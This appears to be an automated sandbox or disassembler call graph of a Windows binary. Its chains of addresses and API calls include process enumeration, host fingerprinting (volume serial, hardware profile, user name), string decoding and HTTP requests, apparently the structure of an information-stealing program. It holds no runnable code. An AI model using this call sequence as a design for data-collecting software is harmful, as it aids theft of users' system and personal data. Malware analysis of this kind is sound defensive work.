73901 247e8 3 API calls 73900->73901 73902 23ce8 73901->73902 73903 247e8 3 API calls 73902->73903 73904 23cff 73903->73904 73905 247e8 3 API calls 73904->73905 73906 23d16 73905->73906 73907 247e8 3 API calls 73906->73907 73908 23d2c 73907->73908 73909 247e8 3 API calls 73908->73909 73910 23d43 73909->73910 73911 247e8 3 API calls 73910->73911 73912 23d57 73911->73912 73913 247e8 3 API calls 73912->73913 73914 23d6e 73913->73914 73915 247e8 3 API calls 73914->73915 73916 23d85 73915->73916 73917 247e8 3 API calls 73916->73917 73918 23d9c 73917->73918 73919 247e8 3 API calls 73918->73919 73920 23db3 73919->73920 73921 247e8 3 API calls 73920->73921 73922 23dca 73921->73922 73923 247e8 3 API calls 73922->73923 73924 23de1 73923->73924 73925 247e8 3 API calls 73924->73925 73926 23df8 73925->73926 73927 247e8 3 API calls 73926->73927 73928 23e0f 73927->73928 73929 247e8 3 API calls 73928->73929 73930 23e26 73929->73930 73931 247e8 3 API calls 73930->73931 73932 23e40 73931->73932 73933 247e8 3 API calls 73932->73933 73934 23e57 73933->73934 73935 247e8 3 API calls 73934->73935 73936 23e6e 73935->73936 73937 247e8 3 API calls 73936->73937 73938 23e84 73937->73938 73939 247e8 3 API calls 73938->73939 73940 23e9b 73939->73940 73941 247e8 3 API calls 73940->73941 73942 23eb2 73941->73942 73943 247e8 3 API calls 73942->73943 73944 23ec9 73943->73944 73945 247e8 3 API calls 73944->73945 73946 23ee0 73945->73946 73947 247e8 3 API calls 73946->73947 73948 23efa 73947->73948 73949 247e8 3 API calls 73948->73949 73950 23f10 73949->73950 73951 247e8 3 API calls 73950->73951 73952 23f27 73951->73952 73953 247e8 3 API calls 73952->73953 73954 23f3e 73953->73954 73955 247e8 3 API calls 73954->73955 73956 23f55 73955->73956 73957 247e8 3 API calls 73956->73957 73958 23f6c 73957->73958 73959 247e8 3 API calls 73958->73959 73960 23f80 73959->73960 73961 247e8 3 API calls 73960->73961 73962 23f97 73961->73962 73963 247e8 3 API calls 73962->73963 73964 23fb1 73963->73964 73965 247e8 3 API calls 73964->73965 73966 23fc7 73965->73966 73967 247e8 3 API calls 73966->73967 73968 23fde 73967->73968 73969 247e8 3 API calls 73968->73969 73970 23ff2 73969->73970 73971 247e8 3 API calls 73970->73971 73972 24009 73971->73972 73973 247e8 3 API calls 73972->73973 73974 24020 73973->73974 73975 247e8 3 API calls 73974->73975 73976 24037 73975->73976 73977 247e8 3 API calls 73976->73977 73978 2404e 73977->73978 73979 247e8 3 API calls 73978->73979 73980 24067 73979->73980 73981 247e8 3 API calls 73980->73981 73982 2407e 73981->73982 73983 247e8 3 API calls 73982->73983 73984 24094 73983->73984 73985 247e8 3 API calls 73984->73985 73986 240a8 73985->73986 73987 247e8 3 API calls 73986->73987 73988 240bf 73987->73988 73989 247e8 3 API calls 73988->73989 73990 240d6 73989->73990 73991 247e8 3 API calls 73990->73991 73992 240ed 73991->73992 73993 247e8 3 API calls 73992->73993 73994 24104 73993->73994 73995 247e8 3 API calls 73994->73995 73996 2411e 73995->73996 73997 247e8 3 API calls 73996->73997 73998 24135 73997->73998 73999 247e8 3 API calls 73998->73999 74000 2414c 73999->74000 74001 247e8 3 API calls 74000->74001 74002 24163 74001->74002 74003 247e8 3 API calls 74002->74003 74004 24179 74003->74004 74005 247e8 3 API calls 74004->74005 74006 2418d 74005->74006 74007 247e8 3 API calls 74006->74007 74008 241a1 74007->74008 74009 247e8 3 API calls 74008->74009 74010 241b8 74009->74010 74011 247e8 3 API calls 74010->74011 74012 241d2 74011->74012 74013 247e8 3 API calls 74012->74013 74014 241e8 74013->74014 74015 247e8 3 API calls 74014->74015 74016 241ff 74015->74016 74017 247e8 3 API calls 74016->74017 74018 24216 74017->74018 74019 247e8 3 API calls 74018->74019 74020 2422d 74019->74020 74021 247e8 3 API calls 74020->74021 74022 24244 74021->74022 74023 247e8 3 API calls 74022->74023 74024 24258 74023->74024 74025 247e8 3 API calls 74024->74025 74026 2426e 74025->74026 74027 247e8 3 API calls 74026->74027 74028 24288 74027->74028 74029 247e8 3 API calls 74028->74029 74030 2429f 74029->74030 74031 247e8 3 API calls 74030->74031 74032 242b6 74031->74032 74033 247e8 3 API calls 74032->74033 74034 242cc 74033->74034 74035 247e8 3 API calls 74034->74035 74036 242e3 74035->74036 74037 247e8 3 API calls 74036->74037 74038 242fa 74037->74038 74039 247e8 3 API calls 74038->74039 74040 24311 74039->74040 74041 247e8 3 API calls 74040->74041 74042 24325 74041->74042 74043 247e8 3 API calls 74042->74043 74044 2433c 74043->74044 74045 247e8 3 API calls 74044->74045 74046 24353 74045->74046 74047 247e8 3 API calls 74046->74047 74048 2436a 74047->74048 74049 247e8 3 API calls 74048->74049 74050 24381 74049->74050 74051 247e8 3 API calls 74050->74051 74052 24395 74051->74052 74053 247e8 3 API calls 74052->74053 74054 243ac 74053->74054 74055 247e8 3 API calls 74054->74055 74056 243c3 74055->74056 74057 247e8 3 API calls 74056->74057 74058 243da 74057->74058 74059 247e8 3 API calls 74058->74059 74060 243f1 74059->74060 74061 247e8 3 API calls 74060->74061 74062 24408 74061->74062 74063 247e8 3 API calls 74062->74063 74064 2441c 74063->74064 74065 247e8 3 API calls 74064->74065 74066 24433 74065->74066 74067 247e8 3 API calls 74066->74067 74068 2444a 74067->74068 74069 247e8 3 API calls 74068->74069 74070 2445e 74069->74070 74071 247e8 3 API calls 74070->74071 74072 24472 74071->74072 74073 247e8 3 API calls 74072->74073 74074 24486 74073->74074 74075 247e8 3 API calls 74074->74075 74076 244a0 74075->74076 74077 247e8 3 API calls 74076->74077 74078 244b7 74077->74078 74079 247e8 3 API calls 74078->74079 74080 244cd 74079->74080 74081 247e8 3 API calls 74080->74081 74082 244e4 74081->74082 74083 247e8 3 API calls 74082->74083 74084 244fa 74083->74084 74085 247e8 3 API calls 74084->74085 74086 24511 74085->74086 74087 247e8 3 API calls 74086->74087 74088 24528 74087->74088 74089 247e8 3 API calls 74088->74089 74090 2453e 74089->74090 74091 247e8 3 API calls 74090->74091 74092 24558 74091->74092 74093 247e8 3 API calls 74092->74093 74094 2456f 74093->74094 74095 247e8 3 API calls 74094->74095 74096 24586 74095->74096 74097 247e8 3 API calls 74096->74097 74098 2459d 74097->74098 74099 247e8 3 API calls 74098->74099 74100 245b4 74099->74100 74101 247e8 3 API calls 74100->74101 74102 245cb 74101->74102 74103 247e8 3 API calls 74102->74103 74104 245e2 74103->74104 74105 247e8 3 API calls 74104->74105 74106 245f9 74105->74106 74107 247e8 3 API calls 74106->74107 74108 24612 74107->74108 74109 247e8 3 API calls 74108->74109 74110 24629 74109->74110 74111 247e8 3 API calls 74110->74111 74112 24642 74111->74112 74113 247e8 3 API calls 74112->74113 74114 24656 74113->74114 74115 247e8 3 API calls 74114->74115 74116 2466d 74115->74116 74117 247e8 3 API calls 74116->74117 74118 24684 74117->74118 74119 247e8 3 API calls 74118->74119 74120 2469b 74119->74120 74121 247e8 3 API calls 74120->74121 74122 246b2 74121->74122 74123 247e8 3 API calls 74122->74123 74124 246cc 74123->74124 74125 247e8 3 API calls 74124->74125 74126 246e3 74125->74126 74127 247e8 3 API calls 74126->74127 74128 246f9 74127->74128 74129 247e8 3 API calls 74128->74129 74130 24710 74129->74130 74131 247e8 3 API calls 74130->74131 74132 24727 74131->74132 74133 247e8 3 API calls 74132->74133 74134 2473d 74133->74134 74135 247e8 3 API calls 74134->74135 74136 24754 74135->74136 74137 247e8 3 API calls 74136->74137 74138 24768 74137->74138 74139 247e8 3 API calls 74138->74139 74140 24781 74139->74140 74141 247e8 3 API calls 74140->74141 74142 24797 74141->74142 74143 247e8 3 API calls 74142->74143 74144 247ae 74143->74144 74145 247e8 3 API calls 74144->74145 74146 247c5 74145->74146 74147 247e8 3 API calls 74146->74147 74148 247dc 74147->74148 74148->73156 75463 4f109 74149->75463 74151 3258e CreateToolhelp32Snapshot Process32First 74152 325c2 Process32Next 74151->74152 74153 325ef CloseHandle 74151->74153 74152->74153 74154 325d4 StrCmpCA 74152->74154 75464 4f165 74153->75464 74154->74152 74156 325e6 74154->74156 74156->74152 74159 304e7 lstrcpyA 74158->74159 74160 31c67 74159->74160 74161 304e7 lstrcpyA 74160->74161 74162 31c75 GetSystemTime 74161->74162 74163 31c91 74162->74163 74164 3d016 __crtGetStringTypeA_stat 5 API calls 74163->74164 74165 31cc8 74164->74165 74165->73163 74168 305e1 74166->74168 74167 30605 74167->73178 74168->74167 74169 305f3 lstrcpyA lstrcatA 74168->74169 74169->74167 74171 30519 lstrcpyA 74170->74171 74172 21d07 74171->74172 74173 30519 lstrcpyA 74172->74173 74174 21d12 74173->74174 74175 30519 lstrcpyA 74174->74175 74176 21d1d 74175->74176 74177 30519 lstrcpyA 74176->74177 74178 21d34 74177->74178 74179 369b6 74178->74179 74180 30549 2 API calls 74179->74180 74181 369ec 74180->74181 74182 30549 2 API calls 74181->74182 74183 369f9 74182->74183 74184 30549 2 API calls 74183->74184 74185 36a06 74184->74185 74186 304e7 lstrcpyA 74185->74186 74187 36a13 74186->74187 74188 304e7 lstrcpyA 74187->74188 74189 36a20 74188->74189 74190 304e7 lstrcpyA 74189->74190 74191 36a2d 74190->74191 74192 304e7 lstrcpyA 74191->74192 74193 36a3a 74192->74193 74194 304e7 lstrcpyA 74193->74194 74195 36a47 74194->74195 74196 304e7 lstrcpyA 74195->74196 74220 36a54 74196->74220 74199 21cfd lstrcpyA 74199->74220 74200 36a98 StrCmpCA 74201 36af1 StrCmpCA 74200->74201 74200->74220 74202 36cd4 74201->74202 74201->74220 74205 3058d lstrcpyA 74202->74205 74206 36cdf 74205->74206 74209 304e7 lstrcpyA 74206->74209 74207 30519 lstrcpyA 74207->74220 74210 36cec 74209->74210 74211 3058d lstrcpyA 74210->74211 74214 36c2c 74211->74214 74212 3683e 28 API calls 74212->74220 74213 368c6 33 API calls 74213->74220 74215 304e7 lstrcpyA 74214->74215 74216 36d0b 74215->74216 74218 3058d lstrcpyA 74216->74218 74217 36b51 StrCmpCA 74217->74220 74221 36baa StrCmpCA 74217->74221 74219 36d15 74218->74219 75476 36da2 74219->75476 74220->74199 74220->74200 74220->74201 74220->74207 74220->74212 74220->74213 74220->74217 74220->74221 74252 3058d lstrcpyA 74220->74252 75467 229f8 74220->75467 75470 22a09 74220->75470 75473 22a1a 74220->75473 75483 22a2b lstrcpyA 74220->75483 75484 22a3c lstrcpyA 74220->75484 75485 22a4d lstrcpyA 74220->75485 74222 36ca3 74221->74222 74223 36bc0 StrCmpCA 74221->74223 74225 3058d lstrcpyA 74222->74225 74226 36c72 74223->74226 74227 36bd6 StrCmpCA 74223->74227 74230 36cae 74225->74230 74228 3058d lstrcpyA 74226->74228 74231 36be8 StrCmpCA 74227->74231 74232 36c3e 74227->74232 74233 36c7d 74228->74233 74235 304e7 lstrcpyA 74230->74235 74236 36c0a 74231->74236 74237 36bfa Sleep 74231->74237 74234 3058d lstrcpyA 74232->74234 74239 304e7 lstrcpyA 74233->74239 74240 36c49 74234->74240 74241 36cbb 74235->74241 74238 3058d lstrcpyA 74236->74238 74237->74220 74242 36c15 74238->74242 74243 36c8a 74239->74243 74244 304e7 lstrcpyA 74240->74244 74245 3058d lstrcpyA 74241->74245 74246 304e7 lstrcpyA 74242->74246 74247 3058d lstrcpyA 74243->74247 74248 36c56 74244->74248 74245->74214 74249 36c22 74246->74249 74247->74214 74250 3058d lstrcpyA 74248->74250 74251 3058d lstrcpyA 74249->74251 74250->74214 74251->74214 74252->74220 74253 36d28 74253->73189 74255 3058d lstrcpyA 74254->74255 74256 38257 74255->74256 74257 3058d lstrcpyA 74256->74257 74258 38262 74257->74258 74259 3058d lstrcpyA 74258->74259 74260 3826d 74259->74260 74260->73193 74262 30529 74261->74262 74263 3053e 74262->74263 74264 30536 lstrcpyA 74262->74264 74263->73206 74264->74263 74266 309e6 GetVolumeInformationA 74265->74266 74267 309df 74265->74267 74268 30a4d 74266->74268 74267->74266 74268->74268 74269 30a62 GetProcessHeap HeapAlloc 74268->74269 74270 30a7d 74269->74270 74271 30a8c wsprintfA lstrcatA 74269->74271 74273 304e7 lstrcpyA 74270->74273 75486 31684 GetCurrentHwProfileA 74271->75486 74274 30a85 74273->74274 74278 3d016 __crtGetStringTypeA_stat 5 API calls 74274->74278 74275 30ac7 lstrlenA 75502 323d5 lstrcpyA malloc strncpy 74275->75502 74277 30aea lstrcatA 74280 30b01 74277->74280 74279 30b2e 74278->74279 74279->73233 74281 304e7 lstrcpyA 74280->74281 74282 30b18 74281->74282 74282->74274 74284 30519 lstrcpyA 74283->74284 74285 24b59 74284->74285 75506 24ab6 74285->75506 74287 24b65 74288 304e7 lstrcpyA 74287->74288 74289 24b81 74288->74289 74290 304e7 lstrcpyA 74289->74290 74291 24b91 74290->74291 74292 304e7 lstrcpyA 74291->74292 74293 24ba1 74292->74293 74294 304e7 lstrcpyA 74293->74294 74295 24bb1 74294->74295 74296 304e7 lstrcpyA 74295->74296 74297 24bc1 InternetOpenA StrCmpCA 74296->74297 74298 24bf5 74297->74298 74299 25194 InternetCloseHandle 74298->74299 74300 31c4a 7 API calls 74298->74300 74310 251e1 74299->74310 74301 24c15 74300->74301 74302 305c7 2 API calls 74301->74302 74303 24c28 74302->74303 74304 3058d lstrcpyA 74303->74304 74305 24c33 74304->74305 74306 30609 3 API calls 74305->74306 74307 24c5f 74306->74307 74308 3058d lstrcpyA 74307->74308 74309 24c6a 74308->74309 74312 30609 3 API calls 74309->74312 74311 3d016 __crtGetStringTypeA_stat 5 API calls 74310->74311 74313 25235 74311->74313 74314 24c8b 74312->74314 74416 339c2 StrCmpCA 74313->74416 74315 3058d lstrcpyA 74314->74315 74316 24c96 74315->74316 74317 305c7 2 API calls 74316->74317 74318 24cb8 74317->74318 74319 3058d lstrcpyA 74318->74319 74320 24cc3 74319->74320 74321 30609 3 API calls 74320->74321 74322 24ce4 74321->74322 74323 3058d lstrcpyA 74322->74323 74324 24cef 74323->74324 74325 30609 3 API calls 74324->74325 74326 24d10 74325->74326 74327 3058d lstrcpyA 74326->74327 74328 24d1b 74327->74328 74329 30609 3 API calls 74328->74329 74330 24d3d 74329->74330 74331 305c7 2 API calls 74330->74331 74332 24d48 74331->74332 74333 3058d lstrcpyA 74332->74333 74334 24d53 74333->74334 74335 24d69 InternetConnectA 74334->74335 74335->74299 74336 24d97 HttpOpenRequestA 74335->74336 74337 24dd7 74336->74337 74338 25188 InternetCloseHandle 74336->74338 74339 24dfb 74337->74339 74340 24ddf InternetSetOptionA 74337->74340 74338->74299 74341 30609 3 API calls 74339->74341 74340->74339 74342 24e11 74341->74342 74343 3058d lstrcpyA 74342->74343 74344 24e1c 74343->74344 74345 305c7 2 API calls 74344->74345 74346 24e3e 74345->74346 74347 3058d lstrcpyA 74346->74347 74348 24e49 74347->74348 74349 30609 3 API calls 74348->74349 74350 24e6a 74349->74350 74351 3058d lstrcpyA 74350->74351 74352 24e75 74351->74352 74353 30609 3 API calls 74352->74353 74354 24e97 74353->74354 74355 3058d lstrcpyA 74354->74355 74356 24ea2 74355->74356 74357 30609 3 API calls 74356->74357 74358 24ec3 74357->74358 74359 3058d lstrcpyA 74358->74359 74360 24ece 74359->74360 74361 30609 3 API calls 74360->74361 74362 24eef 74361->74362 74363 3058d lstrcpyA 74362->74363 74364 24efa 74363->74364 74365 305c7 2 API calls 74364->74365 74366 24f19 74365->74366 74367 3058d lstrcpyA 74366->74367 74368 24f24 74367->74368 74369 30609 3 API calls 74368->74369 74370 24f45 74369->74370 74371 3058d lstrcpyA 74370->74371 74372 24f50 74371->74372 74373 30609 3 API calls 74372->74373 74374 24f71 74373->74374 74375 3058d lstrcpyA 74374->74375 74376 24f7c 74375->74376 74377 305c7 2 API calls 74376->74377 74378 24f9e 74377->74378 74379 3058d lstrcpyA 74378->74379 74380 24fa9 74379->74380 74381 30609 3 API calls 74380->74381 74382 24fca 74381->74382 74383 3058d lstrcpyA 74382->74383 74384 24fd5 74383->74384 74385 30609 3 API calls 74384->74385 74386 24ff7 74385->74386 74387 3058d lstrcpyA 74386->74387 74388 25002 74387->74388 74389 30609 3 API calls 74388->74389 74390 25023 74389->74390 74391 3058d lstrcpyA 74390->74391 74392 2502e 74391->74392 74393 30609 3 API calls 74392->74393 74394 2504f 74393->74394 74395 3058d lstrcpyA 74394->74395 74396 2505a 74395->74396 74397 305c7 2 API calls 74396->74397 74398 25079 74397->74398 74399 3058d lstrcpyA 74398->74399 74400 25084 74399->74400 74401 304e7 lstrcpyA 74400->74401 74402 2509f 74401->74402 74403 305c7 2 API calls 74402->74403 74404 250b6 74403->74404 74405 305c7 2 API calls 74404->74405 74406 250c7 74405->74406 74407 3058d lstrcpyA 74406->74407 74408 250d2 74407->74408 74409 250e8 lstrlenA lstrlenA HttpSendRequestA 74408->74409 74410 2515c InternetReadFile 74409->74410 74411 25176 InternetCloseHandle 74410->74411 74414 2511c 74410->74414 74412 22920 74411->74412 74412->74338 74413 30609 3 API calls 74413->74414 74414->74410 74414->74411 74414->74413 74415 3058d lstrcpyA 74414->74415 74415->74414 74417 339e1 ExitProcess 74416->74417 74418 339e8 strtok_s 74416->74418 74419 33b48 74418->74419 74432 33a04 74418->74432 74419->73241 74420 33b2a strtok_s 74420->74419 74420->74432 74421 33a21 StrCmpCA 74421->74420 74421->74432 74422 33b16 StrCmpCA 74422->74420 74423 33a75 StrCmpCA 74423->74420 74423->74432 74424 33ab4 StrCmpCA 74424->74420 74424->74432 74425 33af4 StrCmpCA 74425->74420 74426 33a59 StrCmpCA 74426->74420 74426->74432 74427 33ac9 StrCmpCA 74427->74420 74427->74432 74428 33a9f StrCmpCA 74428->74420 74428->74432 74429 33ade StrCmpCA 74429->74420 74430 33a3d StrCmpCA 74430->74420 74430->74432 74431 30549 2 API calls 74431->74432 74432->74420 74432->74421 74432->74422 74432->74423 74432->74424 74432->74425 74432->74426 74432->74427 74432->74428 74432->74429 74432->74430 74432->74431 74434 30519 lstrcpyA 74433->74434 74435 25f64 74434->74435 74436 24ab6 5 API calls 74435->74436 74437 25f70 74436->74437 74438 304e7 lstrcpyA 74437->74438 74439 25f8c 74438->74439 74440 304e7 lstrcpyA 74439->74440 74441 25f9c 74440->74441 74442 304e7 lstrcpyA 74441->74442 74443 25fac 74442->74443 74444 304e7 lstrcpyA 74443->74444 74445 25fbc 74444->74445 74446 304e7 lstrcpyA 74445->74446 74447 25fcc InternetOpenA StrCmpCA 74446->74447 74448 26000 74447->74448 74449 266ff InternetCloseHandle 74448->74449 74451 31c4a 7 API calls 74448->74451 75512 28048 CryptStringToBinaryA 74449->75512 74453 26020 74451->74453 74454 305c7 2 API calls 74453->74454 74456 26033 74454->74456 74455 30549 2 API calls 74458 26739 74455->74458 74457 3058d lstrcpyA 74456->74457 74462 2603e 74457->74462 74459 30609 3 API calls 74458->74459 74460 26750 74459->74460 74461 3058d lstrcpyA 74460->74461 74467 2675b 74461->74467 74463 30609 3 API calls 74462->74463 74464 2606a 74463->74464 74465 3058d lstrcpyA 74464->74465 74466 26075 74465->74466 74470 30609 3 API calls 74466->74470 74468 3d016 __crtGetStringTypeA_stat 5 API calls 74467->74468 74469 267eb 74468->74469 74600 3343f strtok_s 74469->74600 74471 26096 74470->74471 74472 3058d lstrcpyA 74471->74472 74473 260a1 74472->74473 74474 305c7 2 API calls 74473->74474 74475 260c3 74474->74475 74476 3058d lstrcpyA 74475->74476 74477 260ce 74476->74477 74478 30609 3 API calls 74477->74478 74479 260ef 74478->74479 74480 3058d lstrcpyA 74479->74480 74481 260fa 74480->74481 74482 30609 3 API calls 74481->74482 74483 2611b 74482->74483 74484 3058d lstrcpyA 74483->74484 74485 26126 74484->74485 74486 30609 3 API calls 74485->74486 74487 26148 74486->74487 74488 305c7 2 API calls 74487->74488 74489 26153 74488->74489 74490 3058d lstrcpyA 74489->74490 74491 2615e 74490->74491 74492 26174 InternetConnectA 74491->74492 74492->74449 74493 261a2 HttpOpenRequestA 74492->74493 74494 261e2 74493->74494 74495 266f3 InternetCloseHandle 74493->74495 74496 26206 74494->74496 74497 261ea InternetSetOptionA 74494->74497 74495->74449 74498 30609 3 API calls 74496->74498 74497->74496 74499 2621c 74498->74499 74500 3058d lstrcpyA 74499->74500 74501 26227 74500->74501 74502 305c7 2 API calls 74501->74502 74503 26249 74502->74503 74504 3058d lstrcpyA 74503->74504 74505 26254 74504->74505 74506 30609 3 API calls 74505->74506 74507 26275 74506->74507 74508 3058d lstrcpyA 74507->74508 74509 26280 74508->74509 74510 30609 3 API calls 74509->74510 74511 262a2 74510->74511 74512 3058d lstrcpyA 74511->74512 74513 262ad 74512->74513 74514 30609 3 API calls 74513->74514 74515 262cf 74514->74515 74516 3058d lstrcpyA 74515->74516 74517 262da 74516->74517 74518 30609 3 API calls 74517->74518 74519 262fb 74518->74519 74520 3058d lstrcpyA 74519->74520 74521 26306 74520->74521 74522 305c7 2 API calls 74521->74522 74523 26325 74522->74523 74524 3058d lstrcpyA 74523->74524 74525 26330 74524->74525 74526 30609 3 API calls 74525->74526 74527 26351 74526->74527 74528 3058d lstrcpyA 74527->74528 74529 2635c 74528->74529 74530 30609 3 API calls 74529->74530 74531 2637d 74530->74531 74532 3058d lstrcpyA 74531->74532 74533 26388 74532->74533 74534 305c7 2 API calls 74533->74534 74535 263aa 74534->74535 74536 3058d lstrcpyA 74535->74536 74537 263b5 74536->74537 74538 30609 3 API calls 74537->74538 74539 263d6 74538->74539 74540 3058d lstrcpyA 74539->74540 74541 263e1 74540->74541 74542 30609 3 API calls 74541->74542 74543 26403 74542->74543 74544 3058d lstrcpyA 74543->74544 74545 2640e 74544->74545 74546 30609 3 API calls 74545->74546 74547 2642f 74546->74547 74548 3058d lstrcpyA 74547->74548 74549 2643a 74548->74549 74550 30609 3 API calls 74549->74550 74551 2645b 74550->74551 74552 3058d lstrcpyA 74551->74552 74553 26466 74552->74553 74554 30609 3 API calls 74553->74554 74555 26487 74554->74555 74556 3058d lstrcpyA 74555->74556 74557 26492 74556->74557 74558 30609 3 API calls 74557->74558 74559 264b3 74558->74559 74560 3058d lstrcpyA 74559->74560 74561 264be 74560->74561 74562 30609 3 API calls 74561->74562 74563 264df 74562->74563 74564 3058d lstrcpyA 74563->74564 74565 264ea 74564->74565 74566 305c7 2 API calls 74565->74566 74567 26506 74566->74567 74568 3058d lstrcpyA 74567->74568 74569 26511 74568->74569 74570 30609 3 API calls 74569->74570 74571 26532 74570->74571 74572 3058d lstrcpyA 74571->74572 74573 2653d 74572->74573 74574 30609 3 API calls 74573->74574 74575 2655f 74574->74575 74576 3058d lstrcpyA 74575->74576 74577 2656a 74576->74577 74578 30609 3 API calls 74577->74578 74579 2658b 74578->74579 74580 3058d lstrcpyA 74579->74580 74581 26596 74580->74581 74582 30609 3 API calls 74581->74582 74583 265b7 74582->74583 74584 3058d lstrcpyA 74583->74584 74585 265c2 74584->74585 74586 305c7 2 API calls 74585->74586 74587 265e1 74586->74587 74588 3058d lstrcpyA 74587->74588 74589 265ec 74588->74589 74590 265f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 74589->74590 75510 47050 74590->75510 74592 2663e lstrlenA lstrlenA 74593 47050 _memmove 74592->74593 74594 26667 lstrlenA HttpSendRequestA 74593->74594 74595 266d2 InternetReadFile 74594->74595 74596 266ec InternetCloseHandle 74595->74596 74598 26692 74595->74598 74596->74495 74597 30609 3 API calls 74597->74598 74598->74595 74598->74596 74598->74597 74599 3058d lstrcpyA 74598->74599 74599->74598 74601 3346e 74600->74601 74604 334cc 74600->74604 74602 30549 2 API calls 74601->74602 74603 334b6 strtok_s 74601->74603 74605 30549 2 API calls 74601->74605 74602->74603 74603->74601 74603->74604 74604->73256 74605->74601 74612 33286 74606->74612 74607 33385 74607->73269 74608 33332 StrCmpCA 74608->74612 74609 30549 2 API calls 74609->74612 74610 33367 strtok_s 74610->74612 74611 33301 StrCmpCA 74611->74612 74612->74607 74612->74608 74612->74609 74612->74610 74612->74611 74613 332dc StrCmpCA 74612->74613 74614 332ab StrCmpCA 74612->74614 74613->74612 74614->74612 74616 33434 74615->74616 74618 333bc 74615->74618 74616->73282 74617 333e2 StrCmpCA 74617->74618 74618->74617 74619 30549 2 API calls 74618->74619 74620 3341a strtok_s 74618->74620 74621 30549 2 API calls 74618->74621 74619->74620 74620->74616 74620->74618 74621->74618 74623 304e7 lstrcpyA 74622->74623 74624 33b9f 74623->74624 74625 30609 3 API calls 74624->74625 74626 33baf 74625->74626 74627 3058d lstrcpyA 74626->74627 74628 33bb7 74627->74628 74629 30609 3 API calls 74628->74629 74630 33bcf 74629->74630 74631 3058d lstrcpyA 74630->74631 74632 33bd7 74631->74632 74633 30609 3 API calls 74632->74633 74634 33bef 74633->74634 74635 3058d lstrcpyA 74634->74635 74636 33bf7 74635->74636 74637 30609 3 API calls 74636->74637 74638 33c0f 74637->74638 74639 3058d lstrcpyA 74638->74639 74640 33c17 74639->74640 74641 30609 3 API calls 74640->74641 74642 33c2f 74641->74642 74643 3058d lstrcpyA 74642->74643 74644 33c37 74643->74644 75517 30cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 74644->75517 74647 30609 3 API calls 74648 33c50 74647->74648 74649 3058d lstrcpyA 74648->74649 74650 33c58 74649->74650 74651 30609 3 API calls 74650->74651 74652 33c70 74651->74652 74653 3058d lstrcpyA 74652->74653 74654 33c78 74653->74654 74655 30609 3 API calls 74654->74655 74656 33c90 74655->74656 74657 3058d lstrcpyA 74656->74657 74658 33c98 74657->74658 75520 315d4 74658->75520 74661 30609 3 API calls 74662 33cb1 74661->74662 74663 3058d lstrcpyA 74662->74663 74664 33cb9 74663->74664 74665 30609 3 API calls 74664->74665 74666 33cd1 74665->74666 74667 3058d lstrcpyA 74666->74667 74668 33cd9 74667->74668 74669 30609 3 API calls 74668->74669 74670 33cf1 74669->74670 74671 3058d lstrcpyA 74670->74671 74672 33cf9 74671->74672 74673 31684 11 API calls 74672->74673 74674 33d09 74673->74674 74675 305c7 2 API calls 74674->74675 74676 33d16 74675->74676 74677 3058d lstrcpyA 74676->74677 74678 33d1e 74677->74678 74679 30609 3 API calls 74678->74679 74680 33d3e 74679->74680 74681 3058d lstrcpyA 74680->74681 74682 33d46 74681->74682 74683 30609 3 API calls 74682->74683 74684 33d5e 74683->74684 74685 3058d lstrcpyA 74684->74685 74686 33d66 74685->74686 74687 309a2 19 API calls 74686->74687 74688 33d76 74687->74688 74689 305c7 2 API calls 74688->74689 74690 33d83 74689->74690 74691 3058d lstrcpyA 74690->74691 74692 33d8b 74691->74692 74693 30609 3 API calls 74692->74693 74694 33dab 74693->74694 74695 3058d lstrcpyA 74694->74695 74696 33db3 74695->74696 74697 30609 3 API calls 74696->74697 74698 33dcb 74697->74698 74699 3058d lstrcpyA 74698->74699 74700 33dd3 74699->74700 74701 33ddb GetCurrentProcessId 74700->74701 75527 3224a OpenProcess 74701->75527 74704 305c7 2 API calls 74705 33df8 74704->74705 74706 3058d lstrcpyA 74705->74706 74707 33e00 74706->74707 74708 30609 3 API calls 74707->74708 74709 33e20 74708->74709 74710 3058d lstrcpyA 74709->74710 74711 33e28 74710->74711 74712 30609 3 API calls 74711->74712 74713 33e40 74712->74713 74714 3058d lstrcpyA 74713->74714 74715 33e48 74714->74715 74716 30609 3 API calls 74715->74716 74717 33e60 74716->74717 74718 3058d lstrcpyA 74717->74718 74719 33e68 74718->74719 74720 30609 3 API calls 74719->74720 74721 33e80 74720->74721 74722 3058d lstrcpyA 74721->74722 74723 33e88 74722->74723 75534 30b30 GetProcessHeap HeapAlloc 74723->75534 74726 30609 3 API calls 74727 33ea1 74726->74727 74728 3058d lstrcpyA 74727->74728 74729 33ea9 74728->74729 74730 30609 3 API calls 74729->74730 74731 33ec1 74730->74731 74732 3058d lstrcpyA 74731->74732 74733 33ec9 74732->74733 74734 30609 3 API calls 74733->74734 74735 33ee1 74734->74735 74736 3058d lstrcpyA 74735->74736 74737 33ee9 74736->74737 75541 31807 74737->75541 74740 305c7 2 API calls 74741 33f06 74740->74741 74742 3058d lstrcpyA 74741->74742 74743 33f0e 74742->74743 74744 30609 3 API calls 74743->74744 74745 33f2e 74744->74745 74746 3058d lstrcpyA 74745->74746 74747 33f36 74746->74747 74748 30609 3 API calls 74747->74748 74749 33f4e 74748->74749 74750 3058d lstrcpyA 74749->74750 74751 33f56 74750->74751 75558 31997 74751->75558 74753 33f67 74754 305c7 2 API calls 74753->74754 74755 33f75 74754->74755 74756 3058d lstrcpyA 74755->74756 74757 33f7d 74756->74757 74758 30609 3 API calls 74757->74758 74759 33f9d 74758->74759 74760 3058d lstrcpyA 74759->74760 74761 33fa5 74760->74761 74762 30609 3 API calls 74761->74762 74763 33fbd 74762->74763 74764 3058d lstrcpyA 74763->74764 74765 33fc5 74764->74765 74766 30c85 3 API calls 74765->74766 74767 33fd2 74766->74767 74768 30609 3 API calls 74767->74768 74769 33fde 74768->74769 74770 3058d lstrcpyA 74769->74770 74771 33fe6 74770->74771 74772 30609 3 API calls 74771->74772 74773 33ffe 74772->74773 74774 3058d lstrcpyA 74773->74774 74775 34006 74774->74775 74776 30609 3 API calls 74775->74776 74777 3401e 74776->74777 74778 3058d lstrcpyA 74777->74778 74779 34026 74778->74779 75573 30c53 GetProcessHeap HeapAlloc GetUserNameA 74779->75573 74781 34033 74782 30609 3 API calls 74781->74782 74783 3403f 74782->74783 74784 3058d lstrcpyA 74783->74784 74785 34047 74784->74785 74786 30609 3 API calls 74785->74786 74787 3405f 74786->74787 74788 3058d lstrcpyA 74787->74788 74789 34067 74788->74789 74790 30609 3 API calls 74789->74790 74791 3407f 74790->74791 74792 3058d lstrcpyA 74791->74792 74793 34087 74792->74793 75574 